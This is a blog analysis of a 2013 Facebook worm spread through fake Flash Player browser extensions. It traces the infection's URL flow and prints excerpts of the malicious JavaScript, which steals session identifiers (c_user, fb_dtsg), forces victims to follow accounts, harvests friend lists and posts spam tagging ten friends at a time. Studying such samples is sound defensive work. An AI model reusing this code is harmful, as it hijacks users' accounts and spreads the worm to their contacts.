Update 2 – Facebook infection: the fake “Flash Player”

In these days I’ve seen some friends of mine taken a facebook virus: this virus posts a message with ten friends tagged and a link to a bad site; the infection, that came from Turkey (almost on the surface), is OS independent just because it uses firefox and chrome extension: a fake Flash Player.

Html code of the link showed:

<-- link to http://xn--47aaeabb.net/ -->
<a target="_blank" 
onclick="LinkshimAsyncLink.swap(this, &quot;\/l.php?u=http\u00253A\u00252F\u00252Fwww.\u0025D4\u0025A3\u0025D4\u0025A3\u0025D4\u0025A1\u0025D4\u0025A3\u0025D4\u0025A1\u0025D4\u0025A3.net\u00252F&amp;h=SAQHWNf0F&amp;s=1&quot;);" 
onmouseover="LinkshimAsyncLink.swap(this, &quot;http:\/\/www.\u0523\u0523\u0521\u0523\u0521\u0523.net\/&quot;);" rel="nofollow" href="http://www.ԣԣԡԣԡԣ.net/" class="pam shareText">
<div class="attachmentText fsm fwn fcg">
<div data-ft="{&quot;type&quot;:11,&quot;tn&quot;:&quot;C&quot;}" class="uiAttachmentTitle">
<strong>https://www.facebook.com/zuck</strong>
</div>
<span data-ft="{&quot;tn&quot;:&quot;L&quot;}" class="caption">
ԣԣԡԣԡԣ.net
</span>
...

</div></a>

From the first url I analyzed the URLs flow (the chrome extension URL is one old):

Infection URLs flowTake alert to chrome extension: the url changes often but the you can recognize bad extension by the “from” field that is: “from sosyalaghileleri.com“, how you can see:

fb_zack_chrome_ext

Analyzing files, as you can see, extensions act when user are into facebook site. The main infection file is user.php (it contains javascript code):

It takes facebook user_id and fb_dtsg  values:

var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;

where the Facebook cookie fields are: c_use, locale, act, p, presence, sub; and the fb_dtsg value came from facebook page:

<form id="logout_form" method="post" action="http://www.facebook.com/logout.php"...>
...
<input type="hidden" name="fb_dtsg" value="AQDLusfb" autocomplete="off" />
...
</form>

Then this script makes you follow one o more users:

abone("10000295XSZSZ");

//follow a fb user
function abone(abone) {
    var http4 = new XMLHttpRequest();

   //from fb follow button: ajaxify="/ajax/follow/follow_profile.php?profile_id=10000295XDXDXD&location=1"
    var url4 = "/ajax/follow/follow_profile.php?__a=1";

    var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
    http4.open("POST", url4, true);
 //....

    http4.send(params4);
}

Then it makes some other things the most interesting on facebook: subscriptions to facebook users and diffusing to other accounts in this way: it catches the event click on the facebook page

//tiklama olayini dinle -&gt; eng: clicking on it will listen to incident(?)
var tiklama = document.addEventListener("click", function () {
    if (document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir") &gt;= 0) {
        ...
        arkadaslari_al(); //take friends list and share a message
        ...
        document.removeEventListener(tiklama);
    }
}, false);

and with arkadaslari_al function, it makes a message tagging ten friends at time:

//arkadaslari al ve isle -&gt; eng: Take his friends and soot(?)
function arkadaslari_al() {
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.onreadystatechange = function () {
    if (xmlhttp.readyState == 4) {
        // read the response as an JavaScript Object : this is friends list            
        eval("arkadaslar = " + xmlhttp.responseText.toString().replace("for (;;);", "") + ";");
        //for group of ten user at time 
        for (f = 0; f &lt; Math.round(arkadaslar.payload.entries.length / 10); f++) {
        //write the message
                mesaj = "";
                mesaj_text = "";
                for (i = f * 10; i &lt; (f + 1) * 10; i++) {
                    if (arkadaslar.payload.entries[i]) { //@Friend
                        mesaj += " @[" + arkadaslar.payload.entries[i].uid + ":" + arkadaslar.payload.entries[i].text + "]";
                        mesaj_text += " " + arkadaslar.payload.entries[i].text;
                    }
                }
                postpaylas(); //share the infection post
            }

        }

    };
    var params = "&amp;filter[0]=user";
    ....
    params += "&amp;__user=" + user_id;

	//get user's friends list
    if (document.URL.indexOf("https://") &gt;= 0) {
        xmlhttp.open("GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true);
    } 
    else {
        xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true);
    }
    xmlhttp.send();
}

And this is the postpaylas  function used to share the infection message:

//postpaylas -> eng: share the post
function postpaylas() {
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.onreadystatechange = function () {
        if (xmlhttp.readyState == 4) {}
    };

    if (document.URL.indexOf("https://") >= 0) {
        xmlhttp.open("POST", "https://www.facebook.com/ajax/sharer/submit_page/?__a=1", true);
    } else {
        xmlhttp.open("POST", "http://www.facebook.com/ajax/sharer/submit_page/?__a=1", true);
    }
// params
    var params = "ad_params=";
    params += "&audience[0][value]=80";
    ...
    params += "&message=" + mesaj;
    params += "&message_text=" + mesaj_text;
    params += "&reshare=" + page_id
    params += "&UIThumbPager_Input=0";
    params += "&attachment[params][0]=" + page_id;
    params += "&attachment[params][1]=" + post_id;
    params += "&attachment[params][images][0]=http://i1.ytimg.com/vi/4kr_LlfqEqo/mqdefault.jpg";
    params += "&attachment[type]=99";
    ....
    params += "&fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;
    ...
    params += "&__user=" + user_id;
    xmlhttp.setRequestHeader("X-SVN-Rev", svn_rev);
    xmlhttp.send(params);
}

This is the zip when you can find all file used by this malware.

Update 2: 03-17-2013

The link used now is: facebooksepetim.com that contain a iframe to http://www.xn--qzbb.tk/ which has the redirect.

Pn